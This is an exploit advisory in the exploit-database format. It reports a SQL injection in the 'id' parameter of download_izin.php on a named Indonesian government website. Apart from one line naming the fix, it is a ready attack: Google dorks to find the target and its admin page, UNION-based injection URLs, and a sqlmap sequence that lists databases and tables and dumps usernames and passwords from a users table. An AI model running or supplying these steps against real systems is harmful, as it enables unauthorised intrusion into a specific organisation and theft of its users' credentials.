#Exploit Title: Location Kota Palopo – SQL Injection vulnerability
#Date: 2020-08-19
#Exploit Author: Hussien AL-Malki
#Vendor Homepage: fortinusa.co.id
#Google Dork: N/A
#Category: webapps
#Tested On: BlackArch Linux, Firefox
#Software Link: dpmptsp.palopokota.go.id/index.html
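Proof of Concept (the `id` query parameter of libs/download_izin.php appears to reach the SQL query unvalidated; casting it to an integer and binding it in a parameterized query is the fix):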
Search google Dork: site:www.dpmptsp.palopokota.go.id/ id=
Demo: http://dpmptsp.palopokota.go.id/libs/download_izin.php?id=37'
Demo: http://dpmptsp.palopokota.go.id/libs/download_izin.php?id=-37 order 55-- -
Demo: dpmptsp.palopokota.go.id/libs/download_izin.php?id=-37 +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55-- -
#################################################################
Use sqlmap
sqlmap -u "http://dpmptsp.palopokota.go.id/libs/download_izin.php?id=37" --dbs
sqlmap -u "http://dpmptsp.palopokota.go.id/libs/download_izin.php?id=37" -D antrian --tables
sqlmap -u "http://dpmptsp.palopokota.go.id/libs/download_izin.php?id=37" -D antrian -T users --columns
sqlmap -u "http://dpmptsp.palopokota.go.id/libs/download_izin.php?id=37" -D antrian -T users -C USERNAME,PASSWORD --dump
Google Dork admin : site:www.dpmptsp.palopokota.go.id/ admin
*********************************************************
#Discovered by: Hussien AL-Malki
*********************************************************